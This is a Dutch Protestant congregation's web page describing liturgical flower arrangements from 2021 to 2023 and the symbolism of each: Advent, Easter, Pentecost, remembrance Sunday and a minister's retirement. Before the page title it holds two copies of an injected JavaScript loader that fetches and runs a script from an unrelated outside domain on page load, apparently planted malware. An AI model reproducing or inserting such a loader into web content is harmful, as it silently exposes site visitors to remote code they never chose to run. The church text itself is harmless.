;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Liturgische schikkingen - PKN Damwâld
Liturgische schikkingen
Eeuwigheidszondag 2023

Op zondag 26 november 2023 was het Eeuwigheidszondag. Op deze zondag herdenken we gemeenteleden die in het afgelopen jaar zijn overleden. De namen van hen worden genoemd en met het licht van de paaskaars wordt een gedachteniskaars aangestoken. De paaskaars herinnert aan de opstanding van Christus en verwijst naar overwinning van het licht en het leven op de duisternis en de dood.

Eeuwigheidszondag staat daarmee enerzijds in het besef van onze sterfelijkheid en anderzijds in het vertrouwen van een eeuwig leven in het licht bij God.

“Niemand leeft voor zichzelf, niemand sterft voor zichzelf. Wij leven en sterven voor God onze Heer. Aan Hem behoren wij toe”.

 

Dankdag 2023

Op 1 november 2023 was het dankdag. Dankdag is een dag waarop we erbij stilstaan dat we God mogen danken voor alle goede dingen in ons leven. We mogen op God vertrouwen. Hij helpt ons en geeft wat we nodig hebben.

Bloemstuk ter gelegenheid van het 40-jarige jubileum van Margrietha Zagema als organist

De grote bladeren links en rechts zijn de handen van de organist. Met deze handen worden de noten gespeeld, de noten worden gesymboliseerd door de rode lampionnetjes. Door het spelen van de noten horen we de klanken uit de pijpen, deze stellen de verticale stokken voor.
Het orgel begeleidt de liederen van de eredienst.
De chrysanten zijn de broeders en zusters die vol lof mee zingen ter ere van God!

Blits!

Blits!  Start seizoen 2023-2024 … kindernevendienst … Geloof, Hoop en Liefde

Avondmaal juni 2023

Bij de viering van het Heilig Avondmaal op 11 juni 2023 kon dit zeer toepasselijk bloemstuk worden bewonderd.

Pinksteren 2023

De liturgische schikking gemaakt rondom Pinksteren 2023. De uitleg is als volgt: ‘Rood is de kleur van Pinksteren. De rode bloemen van de Anthurium verbeelden de tongen van vuur. Het gipskruid, aan de voet van de plant, verwijst naar de mensen waarover de Heilige Geest wordt uitgestort.’

Goede Vrijdag 2023

Dit bloemstuk sierde de liturgische tafel tijdens Goede Vrijdag 2023. Klik op de foto voor een vergroting.

Biddag voor Gewas en Arbeid 2023

Het bloemstuk en de attributen beelden Biddag 2023 schiterend uit. Klik op de foto voor een vergroting!

 

22 januari 2023 Viering Heilig Avondmaal

 

Dit bloemstuk sierde de viering van het Heilig Avondmaal op 22 januari 2023. De foto spreekt voor zich!

Advent & Kerst 2022

Een prachtige verbeelding van Advent en Kerst 2022!

2 november 2022 Dankstond voor gewas en arbeid

Het jaarthema 2022-2023 van de Protestantse Kerk is ‘Aan tafel!’. Het uitspreken van onze dankbaarheid aan de Schepper aan het begin van de maaltijd is een erkenning van onze afhankelijkheid. Tijdens Dankdag onderstrepen we dat in de kerkdienst waarin we danken voor alles wat we uit Gods hand hebben ontvangen in het afgelopen jaar.

 

30 oktober 2022 Tsjerketsjinst Omrop Fryslân

Liturgisch bloemstuk zondag 30 oktober 2022. Het thema is Genesis Genesis 12 : 1 – 9

 

23 oktober 2022 Tsjerketsjinst Omrop Fryslân

Liturgisch bloemstuk zondag 23 oktober 2022. Het thema is Genesis 12: 1-4a

 

15 mei 20220

Dit bloemstuk sierde de kerk tijdens de belijdenisdienst op 15 mei 2022.

 

4 en 5 mei 20220

De bol symboliseert de aarde. Aan de takken zitten dorens dit symboliseert het kwaad van de aarde. De witte gerbera’s zijn de mensen van hoop. De rode roos staat voor geloof, hoop en liefde. De vlag van Nederland staat symbool voor Nederland en de eenheid en de onafhankelijkheid van het gehele Koninkrijk der Nederlanden.

 

40 dagen tijd ... Pasen 2022

Een nieuw begin, een nieuwe lente. De groene takkenconstructie wordt bloeiend. Bloesems, tulpen: de schikking bloeit. Het einde werd een nieuw begin, van waaruit we ons richten op de toekomst!

40 dagen tijd ... 15 april 2022 ... Goede Vrijdag

Bij Goede Vrijdag hoort het kruisteken waarmee we de kruisiging gedenken. Aan de groene takkenstructuur wordt een aantal takken horizontaal toegevoegd, zodat er een latijns kruis ontstaat. De verticale lijnen symboliseren de verbinding met het spirituele, de vervulling. De horizontale lijn in het kruis het aardse leven, het leven dat door zal gaan zoals het zaad in de akker. De 5 anemonen staan voor het lijden en rouw.

40 dagen tijd ... 14 april 2022 ... Witte Donderdag

De tekenen van brood en wijn staan centraal in dit bloemstuk. De buxus tussen de takken is een verwijzing naar de intocht in Jeruzalem. Tussen de takkenstructuur zijn aren geklemd als symbool voor brood en de wijn wordt verbeeld als druiventros. Voor de voetwassing is er een schaal en handdoek.

40 dagen tijd ... Palmpasen 10 april 2022 ... met als thema 'De dorstige drinken geven'

De berkentakken van de schikking van vorige week zondag, staan nu omhoog gericht en zijn symbool voor de armen van de juichende menigte bij de intocht van Jezus. De tulpen in de kleuren geel en roze, geven de glorie en de blijdschap aan van de mensen. Het paars van de Anemonen en het doek verwijst naar de Veertigdagentijd. Het Gipskruid staat symbool voor de gemeenteleden. Het afhangende doek en de stenen symboliseren de weg naar de stad Jeruzalem.

40 dagen tijd ... 3 april 2022 ... met als thema ‘De vreemdeling herbergen’

De 4 berkentakken zijn geschikt als tentstokken voor een onderkomen. De bloemen (gele Trollius en blauwe Portugese sterhyacinthen) zijn de twee kleuren van de Oekraïense vlag, daarmee verwijzend naar de enorme stroom vluchtelingen uit het oorlogsgebied en die over Europa uitzwermt om opgevangen te worden. Het paarse kleed verwijst naar de Veertigdagentijd, waarin wij op dit moment leven.

Kerst 2021

Het paarse doek en de boomstronk zijn weg. Inkeer en verwachting maken plaats voor grote blijdschap. De uitbundige witte schikking straalt het nieuwe begin uit. Maar wij zien ook de tak met rode bessen, een verwijzing naar Zijn strijd en lijden. Het licht van God is onder ons komen wonen. Teken van zegen, van vrede en toekomst. Een Mensenkind die aarde en hemel verbindt.

Vierde Advent 2021

De boomstronk  met aan de onderkant houtsnippers ( aarde) en mos. De verwachting naar een nieuw begin gaat zich aandienen. Aan de boomstronk zien wij dat witte bloemen nu ook hoger bloeien. De bolbloem gaat open. De kleur van de kaars is wit. Alles op aarde wacht op Zijn komst.

Derde Advent 2021

De boomstronk lijkt levenloos met aan de onderkant houtsnippers (aarde) en mos. We zien hedera (klimop) groeien langs de boomstronk. Symbool voor God’s trouw en ook voor onsterfelijkheid. De tijden gaan veranderen. Er komt licht in de duisternis. In de schikking zien wij het gebeuren. Naast de klimop zien wij op de boomstronk meer witte bloempjes. De bolbloem groeit gestaag. Een roze stof cirkelt omhoog.

Tweede Advent 2021

De kleur van het doek blijft paars, de kleur van soberheid en inkeer. De kale wijnstronk lijkt tot leven te komen. Klimop (Hedera), symbool van Gods’ trouw en onsterfelijkheid, slingert zich langs de stronk omhoog. Op het mos groeien witte Gipskruidbloemetjes als een teken van licht. De knop van de bloembol groeit en de zwarte kaars is vervangen door een paarse kaars. 

Eerste Advent 2021

‘De kleur van het doek is paars, de kleur van soberheid, bezinning en inkeer. In de verweerde schaal staan afgestorven planten en een druiventak. Deze tak is kaal en lijkt dood.

Het schors aan de voet van de schaal geeft de verbondenheid met de aarde aan en het groene mos staat symbool voor zachte krachten en moederliefde.

Het Adventsstuk laat de duisternis zien, een tijd van angst en onzekerheid. De zwarte kaars verwijst ook naar deze duisternis. Alleen aan de voet van de tak is een teken van leven: een knop van een bloembol.‘

Ter gelegenheid van het emeritaat ds. S. Boukes 30 mei 2021

Vandaag staat onze liturgische bloemschikking in het teken van dankbaarheid aan God dat u in onze gemeente als predikant werkzaam bent geweest.

De cirkel verwijst naar God en daarmee de eeuwigheid en volmaaktheid. Een cirkel is het symbool voor de oneindige liefde van God en elkander. U was onze herder en leraar, u deed uw werk met Gods trouw en omgeven door de Heilige Geest. Het gekromde hout omwikkeld met klimop en rood lint verwijst naar de herdersstaf. De rode kleur symboliseert de liefde waarmee u het Woord heeft gebracht. Onze gemeente wordt weergegeven door het witte gipskruid. De 40 witte rozen symboliseren de 40 jaren dat u als predikant werkzaam bent geweest.

De rode roos in het midden verwijst naar u als predikant te midden van uw gemeente. U heeft ons willen opbouwen, zodat God ook op de verkondiging vrucht kon geven. De vrucht is uitgebeeld in de walnoot. In dit geval ook wel de vrucht van gedane arbeid waarvan u nu in uw emeritaat mag gaan genieten! De groene klimop beeldt de trouw uit waarmee u uw werk deed en de trouw waarin God u in zijn werk bevestigde.

Wij wensen u Gods Zegen toe.

Pinksteren 23 mei 2021

De 7 rozen symboliseren het getal van de volheid. De rode kleur van de rozen verwijst naar het vuur dat ontvlamt.

Pasen 2021

‘De witte bloemen in de schikking staan symbool voor reinheid en overwinning op het onrecht en de gele voor de vreugde. Als het ware een teken van een nieuw begin. De takken Gipskruid staan voor de gemeenteleden en zowel de gele trompetnarcissen als de witte lelies roepen als het ware : “ De Heer is waarlijk opgestaan!”. Verder verbindt de Klimop , dat symbool staat voor eeuwig leven, het bloemstuk met het geopende graf aan de voet van de vaas. ’

Goede Vrijdag 2021

‘De bladeren die op Palmpasen symbool stonden voor de juichende mensen, staan nu voor de menigte die roept : ‘Kruisigt Hem!’ Het kruis en de doornenkroon spreken voor zich. De rode  Anjers  symboliseren het bloed van Jezus Christus dat voor ons is vergoten. De stenen staan voor wat wij mensen als een steen mee kunnen dragen op ons hart en verwijzen tevens naar de hardheid van de wereld waarin wij leven.’

Witte Donderdag 2021

‘ Links van de vaas met bloemen zien we een schaal met brood, druiven en een glas wijn die verwijzen naar het Laatste Avondmaal. Aan de rechterkant staat een kruik met een handdoek die symbool staan voor de voetwassing, die voorafging aan het Avondmaal.’

Palmpasen 2021

‘De grote bladeren ( w.o. Vingerblad) staan symbool voor de juichende mensen met opgeheven handen. De lelies staan o.a. symbool voor de dood en verwijzen daarmee naar het naderende sterven van Jezus.’